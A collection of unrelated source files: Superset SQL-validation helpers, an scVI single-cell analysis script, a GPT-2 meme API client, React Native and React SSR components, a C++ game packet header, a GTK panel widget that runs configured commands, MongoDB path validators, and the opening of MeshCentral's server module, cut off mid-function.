    statements = parsed_query.get_statements()
    if len(statements) > 1:
        raise SupersetSecurityException(
            SupersetError(
                error_type=SupersetErrorType.DATASOURCE_SECURITY_ACCESS_ERROR,
                message=_("Only single queries supported"),
                level=ErrorLevel.ERROR,
            )
        )
    # TODO(villebro): refactor to use same code that's used by
    #  sql_lab.py:execute_sql_statements
    try:
        # Execute a LIMITed version of the query just to learn the result
        # schema; the cursor description provides the column metadata.
        with closing(engine.raw_connection()) as conn:
            cursor = conn.cursor()
            query = dataset.database.apply_limit_to_sql(statements[0])
            db_engine_spec.execute(cursor, query)
            result = db_engine_spec.fetch_data(cursor, limit=1)
            result_set = SupersetResultSet(result, cursor.description, db_engine_spec)
            cols = result_set.columns
    except Exception as ex:
        raise SupersetGenericDBErrorException(message=str(ex)) from ex
    return cols
def validate_adhoc_subquery(
    sql: str,
    database_id: int,
    default_schema: str,
) -> str:
    """
    Check if adhoc SQL contains sub-queries or nested sub-queries with table.

    If sub-queries are allowed, the adhoc SQL is modified to insert any
    applicable RLS predicates to it.

    :param sql: adhoc sql expression
    :raise SupersetSecurityException if sql contains sub-queries or
    nested sub-queries with table
    """
    # pylint: disable=import-outside-toplevel
    from superset import is_feature_enabled

    rewritten = []
    for statement in sqlparse.parse(sql):
        if has_table_query(statement):
            # Sub-queries referencing tables are only allowed behind a
            # feature flag; when allowed, inject RLS predicates into them.
            if not is_feature_enabled("ALLOW_ADHOC_SUBQUERY"):
                raise SupersetSecurityException(
                    SupersetError(
                        error_type=SupersetErrorType.ADHOC_SUBQUERY_NOT_ALLOWED_ERROR,
                        message=_("Custom SQL fields cannot contain sub-queries."),
                        level=ErrorLevel.ERROR,
                    )
                )
            statement = insert_rls(statement, database_id, default_schema)
        rewritten.append(statement)

    return ";\n".join(str(statement) for statement in rewritten)
def load_or_create_tables(  # pylint: disable=too-many-arguments
    session: Session,
    database: Database,
    default_schema: Optional[str],
    tables: Set[Table],
    conditional_quote: Callable[[str], str],
) -> List[NewTable]:
    """
    Load or create new table model instances.
    """
    if not tables:
        return []

    # set the default schema in tables that don't have it
    if default_schema:
        fixed_tables = list(tables)
        for i, table in enumerate(fixed_tables):
            if table.schema is None:
                fixed_tables[i] = Table(table.table, default_schema, table.catalog)
        tables = set(fixed_tables)

    # load existing tables
    # One OR of per-table AND clauses fetches every match in a single query.
    predicate = or_(
        *[
            and_(
                NewTable.database_id == database.id,
                NewTable.schema == table.schema,
                NewTable.name == table.table,
            )
            for table in tables
        ]
    )
    new_tables = session.query(NewTable).filter(predicate).all()

    # add missing tables
    # Note: NewTable rows expose the name as `.name`, while the sql_parse
    # Table tuples expose it as `.table` — both keys are (schema, name).
    existing = {(table.schema, table.name) for table in new_tables}
    for table in tables:
        if (table.schema, table.table) not in existing:
            try:
                column_metadata = get_physical_table_metadata(
                    database=database,
                    table_name=table.table,
                    schema_name=table.schema,
                )
            # Tables that cannot be introspected are skipped rather than
            # failing the whole batch.
            except Exception:  # pylint: disable=broad-except
                continue
            columns = [
                NewColumn(
                    name=column["name"],
                    type=str(column["type"]),
                    expression=conditional_quote(column["name"]),
                    is_temporal=column["is_dttm"],
                    is_aggregation=False,
                    is_physical=True,
                    is_spatial=False,
                    is_partition=False,
                    is_increase_desired=True,
                )
                for column in column_metadata
            ]
            new_tables.append(
                NewTable(
                    name=table.table,
                    schema=table.schema,
                    catalog=None,
                    database_id=database.id,
                    columns=columns,
                )
            )
            existing.add((table.schema, table.table))

    return new_tables
|
import os
import scanpy as sc
from ._plotting import pair_plot, plot_z_3d, keys_to_colors, plot_x_traj
import numpy as np
from ._mymodel import MyModel
from . import setup_anndata
import scvi
def save_results_txt(
    model_path, latent, cell_type, start_idx, end_idx, time_course, init_indices
):
    """Write analysis results as plain-text files under ``model_path``."""
    # (filename, data, savetxt format or None for the default float format)
    outputs = [
        ("latent.txt", latent, None),
        ("cell_type.txt", cell_type, "%s"),
        ("start_idx.txt", start_idx, "%d"),
        ("end_idx.txt", end_idx, "%d"),
        ("time_course.txt", time_course, None),
        ("init_indices.txt", init_indices, "%d"),
    ]
    for fname, data, fmt in outputs:
        target = os.path.join(model_path, fname)
        if fmt is None:
            np.savetxt(target, data)
        else:
            np.savetxt(target, data, fmt=fmt)
    # print useful command
    out_path = "../../dem/case_studies/"
    cmd = "cp -r " + model_path + " " + out_path
    print("useful command:\n", cmd)
def init_model_name(idx, m_type, n_latent, n_hidden, min_counts, n_top_genes):
    """Ensure the model output directory exists and build a descriptive name.

    The name encodes the hyperparameters, e.g. ``lin7_D3_G2000_H128_MC10``
    (model type + dataset index, latent dim, top genes, hidden units,
    min counts).

    Returns:
        str: the model name (without the ``models/`` directory prefix).
    """
    model_dir = "models"  # hardcoded
    # makedirs(exist_ok=True) replaces the racy `if not exists: mkdir` pattern.
    os.makedirs(model_dir, exist_ok=True)
    model_name = (
        f"{m_type}{idx}_D{n_latent}_G{n_top_genes}_H{n_hidden}_MC{min_counts}"
    )
    return model_name
def parse_args(data_dir, idx, model_name, pretrained):
    """Resolve script arguments and load the dataset selected by ``idx``.

    Args:
        data_dir: directory containing ``.h5ad`` data files.
        idx: 1-based index into the sorted file listing (may be a string).
        model_name: base model name; the data-file stem is appended.
        pretrained: int-like flag; values > 0 mean "load pretrained model".

    Returns:
        tuple: (final model name, loaded AnnData object, pretrained bool).
    """
    # Command line arguments
    idx = int(idx)
    # Comparison already yields a bool; `True if ... else False` was redundant.
    pretrained = int(pretrained) > 0
    print("idx =", idx)
    print("pretrained =", pretrained)
    print(" ")
    # Read data and get final model name
    all_names = sorted(os.listdir(data_dir))
    for j, name in enumerate(all_names):
        print(j + 1, ":", name)
    fn = all_names[idx - 1]
    data_name = fn.split(".")[0]
    model_name = model_name + "-" + data_name
    adata = sc.read_h5ad(os.path.join(data_dir, fn))
    print("\nMODEL_NAME: >>>>>>>>>>", model_name, "<<<<<<<<<<<")
    return model_name, adata, pretrained
def analysis(
    data_dir, idx, pretrained, linear, n_latent, n_hidden, min_counts, n_top_genes,
    decode_traj = False):
    """End-to-end scVI analysis for one dataset in ``data_dir``.

    Selects the dataset by 1-based ``idx``, preprocesses it (gene filtering,
    normalization, highly-variable-gene selection), trains or loads a
    LinearSCVI model, and writes latent-space plots, UMAPs and text results.

    Args:
        data_dir: directory of .h5ad files.
        idx: 1-based index of the dataset in the sorted directory listing.
        pretrained: truthy flag; load a saved model instead of training.
        linear: only affects the model-name prefix ("lin" vs "nl").
            NOTE(review): a LinearSCVI model is created either way — confirm
            whether a non-linear model was intended when linear is False.
        n_latent: latent-space dimensionality.
        n_hidden: hidden-layer width.
        min_counts: gene-filter threshold.
        n_top_genes: number of highly variable genes to keep.
        decode_traj: with ``pretrained``, decode saved latent trajectories
            from ``z_traj.npy`` and return early.

    Returns:
        (adata, model) tuple, or None when ``decode_traj`` short-circuits.
    """
    # Setup
    m_type = "lin" if linear else "nl"
    model_name = init_model_name(
        idx, m_type, n_latent, n_hidden, min_counts, n_top_genes
    )
    model_name, adata, pretrained = parse_args(data_dir, idx, model_name, pretrained)
    # Get names of start and end cell(s), and pseudotime
    cell_ids = adata.obs["cell_id"]
    cell_type = adata.obs["cell_type"]
    start_idx = np.where(np.isin(cell_ids, adata.uns["start_id"]))[0]
    end_idx = np.where(np.isin(cell_ids, adata.uns["end_id"]))[0]
    time_course = np.array(adata.obs["timecourse"])
    print("start cell(s):", start_idx)
    print("end cell(s):", end_idx)
    # Get indices of all start cells (all cells sharing the first start cell's type)
    init_type = np.array(cell_type[start_idx])[0]
    print("init_type: ", init_type)
    init_indices = np.where(np.array(cell_type) == init_type)[0]
    print("found", len(init_indices), "cells of type", init_type)
    # Set output file names
    pairs_fn = "pairs-" + model_name + ".png"
    umap1_fn = "-celltype-" + model_name + ".png"
    umap2_fn = "-timecourse-" + model_name + ".png"
    # Filter genes
    sc.pp.filter_genes(adata, min_counts=min_counts)
    # Normalize (store also raw)
    adata.layers["counts"] = adata.X.copy()  # preserve counts
    sc.pp.normalize_total(adata, target_sum=1e4)
    sc.pp.log1p(adata)
    adata.raw = adata  # freeze the state in `.raw`
    # Select highly variable genes
    sc.pp.highly_variable_genes(
        adata, n_top_genes=n_top_genes, subset=True, layer="counts", flavor="seurat_v3"
    )
    # Setup adata and model directory
    setup_anndata(adata, layer="counts", labels_key="cell_type")
    model_path = os.path.join("models", model_name)
    print(adata)
    if not pretrained:
        # Create and train model
        model = scvi.model.LinearSCVI(adata, n_latent=n_latent, n_hidden=n_hidden)
        model.train()
        model.save(model_path)
    else:
        # Load pretrained model
        model = scvi.model.LinearSCVI.load(model_path, adata)
        print("Loaded model from:", model_path)
        if decode_traj:
            # Decode previously saved latent trajectories and stop here.
            z_traj = np.load(os.path.join(model_path, "z_traj.npy"))
            decode_trajectories(model, adata, z_traj)
            return None
    # Get latent and plot
    latent = model.get_latent_representation()
    cell_colors = keys_to_colors(cell_type)
    pair_plot(
        latent, cell_colors, save_name=pairs_fn, start_idx=start_idx, end_idx=end_idx
    )
    if n_latent == 3:
        plot_z_3d(latent, cell_colors)
    # Rec error
    rerr = model.get_reconstruction_error()
    print("Reconstruction error = ", rerr)
    adata.obsm["X_scVI"] = latent
    # use scVI latent space for UMAP generation
    sc.pp.neighbors(adata, use_rep="X_scVI")
    sc.tl.umap(adata, min_dist=0.2)
    sc.pl.umap(adata, color=["cell_type"], frameon=False, save=umap1_fn, show=False)
    sc.pl.umap(adata, color=["timecourse"], frameon=False, save=umap2_fn, show=False)
    # save latent representation as txt
    save_results_txt(
        model_path, latent, cell_type, start_idx, end_idx, time_course, init_indices
    )
    return adata, model
def decode_trajectories(model, adata, z_traj):
    """Project latent trajectories back to gene space with the linear decoder,
    then plot a few randomly chosen genes."""
    print("Using VAE decoder to decode trajectories!")
    # Loadings come back as (genes x latent); transpose to (latent x genes).
    loadings = model.get_loadings().to_numpy().T
    print("W:", loadings.shape)
    print("z_traj:", z_traj.shape)
    n_steps, n_traj = z_traj.shape[0], z_traj.shape[1]
    n_genes = loadings.shape[1]
    decoded = np.zeros((n_traj, n_steps, n_genes))
    for traj_idx in range(n_traj):
        # (steps x latent) @ (latent x genes) -> (steps x genes)
        decoded[traj_idx, :, :] = np.matmul(z_traj[:, traj_idx, :], loadings)
    print("X_traj:", decoded.shape)
    np.random.seed(123)
    gene_inds = np.random.choice(n_genes, size=5, replace=False)
    print("gene_inds:", gene_inds)
    plot_x_traj(decoded, gene_inds)
|
import json
import random
import requests
import os
from nltk import word_tokenize, pos_tag, download
from confessionscommenter.general_utils import HiddenPrints
#Download necessary tokenizers
# NLTK models used by SHAREAPI.get_initial_word_from_text's "ntlk_verbs" mode.
download("punkt", quiet=True)
download("averaged_perceptron_tagger", quiet=True)
# Build the GPT-2 text-generation pipeline once at module import time;
# HiddenPrints suppresses the transformers library's console output.
with HiddenPrints():
    from transformers import pipeline
    generator = pipeline('text-generation', model='gpt2')
class SHAREAPI:
    """Client for the SHARE meme/GPT-2 prediction API plus local text helpers."""

    def __init__(self):
        # Base URL of the deployed API gateway.
        self.root_link = "https://07oyvkdcgg.execute-api.us-west-1.amazonaws.com/Prod"

    def get_generatable_memes_info(self):
        """Return metadata about generatable memes from the bundled JSON file."""
        with open(os.path.join(os.path.dirname(__file__), "meme_data.json")) as f:  # TODO: Maybe make an API call here?
            res = json.load(f)
        return res

    def get_initial_word_from_text(self, text, method="long_words"):  # TODO: Maybe make an API call here?
        """Pick a seed word from ``text``.

        ``method="long_words"`` returns a random word longer than 4 chars;
        ``"ntlk_verbs"`` (historical typo, ``"nltk_verbs"`` also accepted)
        returns a random verb found via NLTK POS tagging. Returns "" when
        nothing matches or the method is unknown.
        """
        if method == "long_words":
            important_words = [word for word in text.split(" ") if len(word) > 4]
            if important_words:  # truthiness instead of len(...) > 0
                return random.choice(important_words)
            return ""
        if method in ("ntlk_verbs", "nltk_verbs"):  # keep original misspelling for compatibility
            # From https://stackoverflow.com/questions/5404243/extracting-english-verbs-from-a-given-text/5410074
            tokens = word_tokenize(text)
            pos_tagged_tokens = pos_tag(tokens)
            verbs = [word[0] for word in pos_tagged_tokens if word[1].startswith('V')]
            if verbs:
                return random.choice(verbs)
            return ""
        return ""

    def predict_meme_text(self, template_id, num_boxes, init_text="", beam_width=1, max_output_length=140):
        """Ask the API for meme text; returns the outputs list or 'Error'."""
        params = {
            'api_method': 'predict_meme',  # REQUIRED
            'template_id': template_id,
            'num_boxes': num_boxes,
            'init_text': init_text,
            'beam_width': beam_width,
            'max_output_length': max_output_length
        }
        response = requests.get(f"{self.root_link}/predict", params=params).json()
        if 'outputs' in response:
            return response['outputs']
        return 'Error'

    def generate_gpt2_comments(self, msg, num=1):
        """Generate ``num`` GPT-2 continuations for the text after the first
        word of ``msg`` (the command word is stripped off)."""
        with HiddenPrints():
            # `generator` is the module-level pipeline; `global` is not needed
            # just to read a module-level name.
            q = msg[(msg.index(" ") + 1):]
            prompt = f"{q}\n RESPONSE: "
            text = generator(prompt, max_length=len(prompt.split(" ")) + 100, num_return_sequences=num)
            return [text[i]['generated_text'][len(prompt):] for i in range(num)]

    # def _generate_gpt2_comments(self, prompt, max_length, num_return_sequences):
    #     """STIL NOT READY. DO NOT USE YET"""
    #     params = {
    #         'api_method': 'predict_gpt2',  # REQUIRED
    #         'prompt': prompt,
    #         'max_length': max_length,
    #         'num_return_sequences': num_return_sequences,
    #     }
    #     response = requests.get(f"{self.root_link}/predict", params=params).json()  # TODO: Handle when the api call times out
    #     print(response)
    #     return response['outputs']
# Manual smoke test: request meme text for template 3218037 with two text boxes.
if __name__ == '__main__':
    x = SHAREAPI()
    print(x.predict_meme_text(3218037, 2))
|
import React from 'react';
import {
Text, View, TouchableOpacity, Image, StyleSheet
} from 'react-native';
import PropTypes from 'prop-types';
import I18n from '../../../i18n';
import sharedStyles from '../../Styles';
import { COLOR_PRIMARY } from '../../../constants/colors';
// Styles for the rooms-list header: centered title, server-name row and
// the disclosure caret that flips when the server dropdown is open.
const styles = StyleSheet.create({
	container: {
		flex: 1,
		alignItems: 'center',
		justifyContent: 'center'
	},
	button: {
		// Server name and disclosure icon laid out in a row.
		flexDirection: 'row'
	},
	title: {
		fontSize: 14,
		...sharedStyles.textColorTitle,
		...sharedStyles.textRegular
	},
	server: {
		fontSize: 12,
		color: COLOR_PRIMARY,
		...sharedStyles.textRegular
	},
	disclosure: {
		marginLeft: 3,
		marginTop: 1,
		width: 12,
		height: 9
	},
	upsideDown: {
		// Vertical flip for the caret while the dropdown is shown.
		transform: [{ scaleY: -1 }],
		marginTop: 4
	}
});
const HeaderTitle = React.memo(({ connecting, isFetching }) => {
let title = I18n.t('Messages');
if (connecting) {
title = I18n.t('Connecting');
}
if (isFetching) {
title = I18n.t('Updating');
}
return <Text style={styles.title}>{title}</Text>;
});
// Rooms-list header: status title plus the current server name with a
// disclosure caret. Tapping it opens the server dropdown; the button is
// disabled while connecting/fetching.
const Header = React.memo(({
	connecting, isFetching, serverName, showServerDropdown, onPress
}) => (
	<View style={styles.container}>
		<TouchableOpacity
			onPress={onPress}
			testID='rooms-list-header-server-dropdown-button'
			style={styles.container}
			disabled={connecting || isFetching}
		>
			<HeaderTitle connecting={connecting} isFetching={isFetching} />
			<View style={styles.button}>
				<Text style={styles.server}>{serverName}</Text>
				{/* Caret flips upside down while the dropdown is open. */}
				<Image style={[styles.disclosure, showServerDropdown && styles.upsideDown]} source={{ uri: 'disclosure_indicator_server' }} />
			</View>
		</TouchableOpacity>
	</View>
));
// Runtime prop validation for the exported Header component.
Header.propTypes = {
	connecting: PropTypes.bool,
	isFetching: PropTypes.bool,
	serverName: PropTypes.string,
	showServerDropdown: PropTypes.bool.isRequired,
	onPress: PropTypes.func.isRequired
};
// Fallback shown before the actual server name is known.
Header.defaultProps = {
	serverName: 'Rocket.Chat'
};
HeaderTitle.propTypes = {
	connecting: PropTypes.bool,
	isFetching: PropTypes.bool
};
export default Header;
|
// @flow
import * as React from 'react';
import { StaticRouter } from 'react-router';
import Landing from './landing.react';
// Props for server-side rendering: the request URL and the router basename.
export type LandingSSRProps = {
  +url: string,
  +basename: string,
};
function LandingSSR(props: LandingSSRProps): React.Node {
const { url, basename } = props;
const routerContext = React.useMemo(() => ({}), []);
return (
<StaticRouter location={url} basename={basename} context={routerContext}>
<Landing />
</StaticRouter>
);
}
export default LandingSSR;
|
#ifndef _CG_TEAMLEADERRETINVITE_H_
#define _CG_TEAMLEADERRETINVITE_H_
#include "Type.h"
#include "Packet.h"
#include "PacketFactory.h"
namespace Packets
{
// Client->GameServer packet: the invitee's reply to a team-leader invitation.
class CGTeamLeaderRetInvite: public Packet
{
public:
CGTeamLeaderRetInvite(){};
virtual ~CGTeamLeaderRetInvite(){};
// Common packet interface
virtual BOOL Read( SocketInputStream& iStream ) ;
virtual BOOL Write( SocketOutputStream& oStream )const ;
virtual UINT Execute( Player* pPlayer ) ;
virtual PacketID_t GetPacketID()const { return PACKET_CG_TEAMLEADERRETINVITE ; }
// Wire size: 1-byte answer plus two GUIDs (inviter + invitee).
virtual UINT GetPacketSize()const { return sizeof(BYTE)+
sizeof(GUID_t)*2; }
public :
VOID SetReturn( BOOL bRet ){ m_Return = (BYTE)bRet ; }
BOOL GetReturn( ){ return (BOOL)m_Return ; }
VOID SetSourGUID( GUID_t guid ){ m_SourGUID = guid ; }
GUID_t GetSourGUID( ){ return m_SourGUID ; }
VOID SetDestGUID( GUID_t guid ){ m_DestGUID = guid ; }
GUID_t GetDestGUID( ){ return m_DestGUID ; }
public :
BYTE m_Return ;    // accept/decline flag, stored as BYTE for wire size
GUID_t m_SourGUID ; // inviter
GUID_t m_DestGUID ; // invitee
};
// Factory registered with the packet dispatcher to construct this packet type.
class CGTeamLeaderRetInviteFactory: public PacketFactory
{
public:
Packet* CreatePacket() { return new CGTeamLeaderRetInvite() ; }
PacketID_t GetPacketID()const { return PACKET_CG_TEAMLEADERRETINVITE ; }
// Must match CGTeamLeaderRetInvite::GetPacketSize().
UINT GetPacketMaxSize()const { return sizeof(BYTE)+
sizeof(GUID_t)*2; }
};
// Server-side handler; Execute() is implemented elsewhere and processes the
// invitee's reply on behalf of pPlayer.
class CGTeamLeaderRetInviteHandler
{
public:
static UINT Execute(CGTeamLeaderRetInvite* pPacket,Player* pPlayer);
};
}
using namespace Packets;
#endif
|
#!/usr/bin/env python3
from gi.repository import GLib
import subprocess
import threading
from nwg_panel.tools import check_key, update_image
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk, Gdk, GdkPixbuf
class Executor(Gtk.EventBox):
    """Panel module that periodically runs a user script and shows its output.

    Script stdout is interpreted by update_widget():
      * one line ending in .svg/.png -> icon,
      * one other line               -> label text,
      * two lines                    -> icon (line 1) + label (line 2).
    The ``on-*`` settings bind shell commands to mouse buttons and scrolling.
    """

    def __init__(self, settings, icons_path):
        self.settings = settings
        self.icons_path = icons_path
        Gtk.EventBox.__init__(self)
        self.box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)
        self.add(self.box)
        self.image = Gtk.Image()
        self.label = Gtk.Label("")
        self.icon_path = None  # last applied icon source; avoids redundant reloads
        # Ensure all expected settings keys exist (defaults added only if missing).
        check_key(settings, "script", "")
        check_key(settings, "interval", 0)
        check_key(settings, "root-css-name", "root-executor")
        check_key(settings, "css-name", "")
        check_key(settings, "icon-placement", "left")
        check_key(settings, "icon-size", 16)
        check_key(settings, "tooltip-text", "")
        check_key(settings, "on-left-click", "")
        check_key(settings, "on-right-click", "")
        check_key(settings, "on-middle-click", "")
        check_key(settings, "on-scroll-up", "")
        check_key(settings, "on-scroll-down", "")
        update_image(self.image, "view-refresh-symbolic", self.settings["icon-size"], self.icons_path)
        self.set_property("name", settings["root-css-name"])
        # reverting #57, as check_key only adds keys if MISSING, not if empty
        if settings["css-name"]:
            self.label.set_property("name", settings["css-name"])
        else:
            self.label.set_property("name", "executor-label")
        if settings["tooltip-text"]:
            self.set_tooltip_text(settings["tooltip-text"])
        if settings["on-left-click"] or settings["on-right-click"] or settings["on-middle-click"] or settings[
                "on-scroll-up"] or settings["on-scroll-down"]:
            self.connect('button-press-event', self.on_button_press)
            self.add_events(Gdk.EventMask.SCROLL_MASK)
            self.connect('scroll-event', self.on_scroll)
            self.connect('enter-notify-event', self.on_enter_notify_event)
            self.connect('leave-notify-event', self.on_leave_notify_event)
        self.build_box()
        self.refresh()
        if settings["interval"] > 0:
            # Re-run the script every `interval` seconds on the GLib main loop.
            Gdk.threads_add_timeout_seconds(GLib.PRIORITY_LOW, settings["interval"], self.refresh)

    def update_widget(self, output):
        """Apply script output lines to the widget (runs on the GTK main thread).

        Returns False so it works as a one-shot GLib.idle_add callback.
        """
        if output:
            if len(output) == 1:
                if output[0].endswith(".svg") or output[0].endswith(".png"):
                    new_path = output[0].strip()
                    if new_path != self.icon_path:
                        # NOTE(review): a value ending in .svg/.png always contains
                        # ".", so this name-not-path branch looks unreachable here.
                        if "/" not in new_path and "." not in new_path:  # name given instead of path
                            update_image(self.image, new_path, self.settings["icon-size"], self.icons_path)
                            self.icon_path = new_path
                        else:
                            try:
                                pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(
                                    new_path, self.settings["icon-size"], self.settings["icon-size"])
                                self.image.set_from_pixbuf(pixbuf)
                                self.icon_path = new_path
                            except Exception:  # narrowed from a bare `except:`
                                print("Failed setting image from {}".format(output[0].strip()))
                    if not self.image.get_visible():
                        self.image.show()
                    if self.label.get_visible():
                        self.label.hide()
                else:
                    # Single non-image line: show it as the label, hide the icon.
                    if self.image.get_visible():
                        self.image.hide()
                    self.label.set_text(output[0].strip())
                    if not self.label.get_visible():
                        self.label.show()
            elif len(output) == 2:
                new_path = output[0].strip()
                if "/" not in new_path and "." not in new_path:  # name given instead of path
                    update_image(self.image, new_path, self.settings["icon-size"], self.icons_path)
                    self.icon_path = new_path
                else:
                    if new_path != self.icon_path:
                        try:
                            pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(
                                new_path, self.settings["icon-size"], self.settings["icon-size"])
                            self.image.set_from_pixbuf(pixbuf)
                            self.icon_path = new_path
                        except Exception:  # narrowed from a bare `except:`
                            print("Failed setting image from {}".format(output[0].strip()))
                self.label.set_text(output[1].strip())
                self.image.show()
                if self.label.get_text():
                    self.label.show()
        else:
            # No output at all: hide both icon and label.
            if self.image.get_visible():
                self.image.hide()
            if self.label.get_visible():
                self.label.hide()
        return False

    def get_output(self):
        """Run the configured script (worker thread) and hand the output lines
        to update_widget() on the main thread via GLib.idle_add."""
        if "script" in self.settings and self.settings["script"]:
            try:
                output = subprocess.check_output(self.settings["script"].split()).decode("utf-8").splitlines()
                GLib.idle_add(self.update_widget, output)
            except Exception as e:
                print(e)

    def refresh(self):
        """Start a background script run; returns True so the GLib timeout
        that calls it keeps repeating."""
        thread = threading.Thread(target=self.get_output)
        thread.daemon = True
        thread.start()
        return True

    def build_box(self):
        """Pack icon and label according to the `icon-placement` setting."""
        if self.settings["icon-placement"] == "left":
            self.box.pack_start(self.image, False, False, 2)
        self.box.pack_start(self.label, False, False, 2)
        if self.settings["icon-placement"] != "left":
            self.box.pack_start(self.image, False, False, 2)

    def on_enter_notify_event(self, widget, event):
        # Highlight the widget on hover.
        widget.set_state_flags(Gtk.StateFlags.DROP_ACTIVE, clear=False)
        widget.set_state_flags(Gtk.StateFlags.SELECTED, clear=False)

    def on_leave_notify_event(self, widget, event):
        widget.unset_state_flags(Gtk.StateFlags.DROP_ACTIVE)
        widget.unset_state_flags(Gtk.StateFlags.SELECTED)

    def on_button_press(self, widget, event):
        if event.button == 1 and self.settings["on-left-click"]:
            self.launch(self.settings["on-left-click"])
        elif event.button == 2 and self.settings["on-middle-click"]:
            self.launch(self.settings["on-middle-click"])
        elif event.button == 3 and self.settings["on-right-click"]:
            self.launch(self.settings["on-right-click"])

    def on_scroll(self, widget, event):
        if event.direction == Gdk.ScrollDirection.UP and self.settings["on-scroll-up"]:
            self.launch(self.settings["on-scroll-up"])
        elif event.direction == Gdk.ScrollDirection.DOWN and self.settings["on-scroll-down"]:
            # Bug fix: scroll-down previously checked and launched the
            # "on-scroll-up" command.
            self.launch(self.settings["on-scroll-down"])
        else:
            print("No command assigned")

    def launch(self, cmd):
        print("Executing '{}'".format(cmd))
        subprocess.Popen('exec {}'.format(cmd), shell=True)
|
from pathlib import Path
import warnings
from typing import List
from collections import Counter
# Validate if no duplicate video keys exist
# Moved to classes.db_interventions
def validate_video_keys(db_interventions) -> List:
    """Expects db_intervention collection, filters for non unique video_keys

    Args:
        db_interventions (mongoCollection):

    Returns:
        List: List of non-unique video keys
    """
    cursor = db_interventions.find(
        {"video_key": {"$exists": True}}, {"video_key": 1}
    )
    # Count occurrences directly from the cursor; no intermediate key list.
    key_counts = Counter(doc["video_key"] for doc in cursor)
    duplicates = [key for key, count in key_counts.items() if count > 1]
    if duplicates:
        warnings.warn("Non unique video keys detected")
    return duplicates
# Validate if files exist
def validate_image_paths(db_images) -> List:
    """
    Expects db image collection. Checks all paths if they exist.
    Warns if any paths do not exist and returns list of image ids where path doesn't exist.
    """
    image_ids = [
        doc["_id"]
        for doc in db_images.find({}, {"path": 1})
        if not Path(doc["path"]).exists()
    ]
    if image_ids:
        warnings.warn(
            "Not all images for paths of given image collection exist. Returning ID's of invalid images"
        )
    return image_ids
# Validate if video files exist
def validate_video_paths(db_interventions) -> List:
    """
    Expects db interventions collection. Checks, for all entries which have a
    "video_path", whether the video file exists.
    Warns if any paths do not exist and returns list of intervention ids where path doesn't exist.
    """
    # NOTE: matches on "video_path" (the docstring previously said "video_key").
    agg = [{"$match": {"video_path": {"$exists": True}}}]
    videos = db_interventions.aggregate(agg)
    video_ids = []
    for video in videos:
        if not Path(video["video_path"]).exists():
            video_ids.append(video["_id"])
    if video_ids:
        warnings.warn(
            "Not all videos for paths of given intervention collection exist. Returning ID's of invalid interventions"
        )
    return video_ids
|
/**
* @description MeshCentral main module
* @author Ylian Saint-Hilaire
* @copyright Intel Corporation 2018-2020
* @license Apache-2.0
* @version v0.0.1
*/
/*xjslint node: true */
/*xjslint plusplus: true */
/*xjslint maxlen: 256 */
/*jshint node: true */
/*jshint strict: false */
/*jshint esversion: 6 */
"use strict";
// If running NodeJS less than version 8, try to polyfill promisify
// (the util.promisify shim keeps promise-based code working on old runtimes).
try { if (Number(process.version.match(/^v(\d+\.\d+)/)[1]) < 8) { require('util.promisify').shim(); } } catch (ex) { }
// If app metrics is available, expose a local metrics dashboard on 127.0.0.1:88
// when started with --launch; silently skipped if the package is absent.
if (process.argv[2] == '--launch') { try { require('appmetrics-dash').monitor({ url: '/', title: 'MeshCentral', port: 88, host: '127.0.0.1' }); } catch (e) { } }
function CreateMeshCentralServer(config, args) {
var obj = {};
obj.db = null;
obj.webserver = null;
obj.redirserver = null;
obj.mpsserver = null;
obj.apfserver = null;
obj.mqttbroker = null;
obj.swarmserver = null;
obj.mailserver = null;
obj.amtEventHandler = null;
obj.pluginHandler = null;
obj.amtScanner = null;
obj.meshScanner = null;
obj.letsencrypt = null;
obj.eventsDispatch = {};
obj.fs = require('fs');
obj.path = require('path');
obj.crypto = require('crypto');
obj.exeHandler = require('./exeHandler.js');
obj.platform = require('os').platform();
obj.args = args;
obj.common = require('./common.js');
obj.configurationFiles = null;
obj.certificates = null;
obj.connectivityByNode = {}; // This object keeps a list of all connected CIRA and agents, by nodeid->value (value: 1 = Agent, 2 = CIRA, 4 = AmtDirect)
obj.peerConnectivityByNode = {}; // This object keeps a list of all connected CIRA and agents of peers, by serverid->nodeid->value (value: 1 = Agent, 2 = CIRA, 4 = AmtDirect)
obj.debugSources = [];
obj.debugRemoteSources = null;
obj.config = config; // Configuration file
obj.dbconfig = {}; // Persistance values, loaded from database
obj.certificateOperations = null;
obj.defaultMeshCmd = null;
obj.defaultMeshCores = {};
obj.defaultMeshCoresHash = {};
obj.meshAgentBinaries = {}; // Mesh Agent Binaries, Architecture type --> { hash:(sha384 hash), size:(binary size), path:(binary path) }
obj.meshAgentInstallScripts = {}; // Mesh Install Scripts, Script ID -- { hash:(sha384 hash), size:(binary size), path:(binary path) }
obj.multiServer = null;
obj.maintenanceTimer = null;
obj.serverId = null;
obj.serverKey = Buffer.from(obj.crypto.randomBytes(48), 'binary');
obj.loginCookieEncryptionKey = null;
obj.invitationLinkEncryptionKey = null;
obj.serverSelfWriteAllowed = true;
obj.serverStatsCounter = Math.floor(Math.random() * 1000);
obj.taskLimiter = obj.common.createTaskLimiterQueue(50, 20, 60); // (maxTasks, maxTaskTime, cleaningInterval) This is a task limiter queue to smooth out server work.
obj.agentUpdateBlockSize = 65531; // MeshAgent update block size
obj.serverWarnings = []; // List of warnings that should be shown to administrators
obj.cookieUseOnceTable = {}; // List of cookies that are already expired
obj.cookieUseOnceTableCleanCounter = 0; // Clean the cookieUseOnceTable each 20 additions
obj.firstStats = true; // True until this server saves it's not stats to the database
// Server version
obj.currentVer = null;
function getCurrentVerion() { try { obj.currentVer = JSON.parse(obj.fs.readFileSync(obj.path.join(__dirname, 'package.json'), 'utf8')).version; } catch (e) { } return obj.currentVer; } // Fetch server version
getCurrentVerion();
// Setup the default configuration and files paths
if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) {
obj.parentpath = obj.path.join(__dirname, '../..');
obj.datapath = obj.path.join(__dirname, '../../meshcentral-data');
obj.filespath = obj.path.join(__dirname, '../../meshcentral-files');
obj.backuppath = obj.path.join(__dirname, '../../meshcentral-backup');
obj.recordpath = obj.path.join(__dirname, '../../meshcentral-recordings');
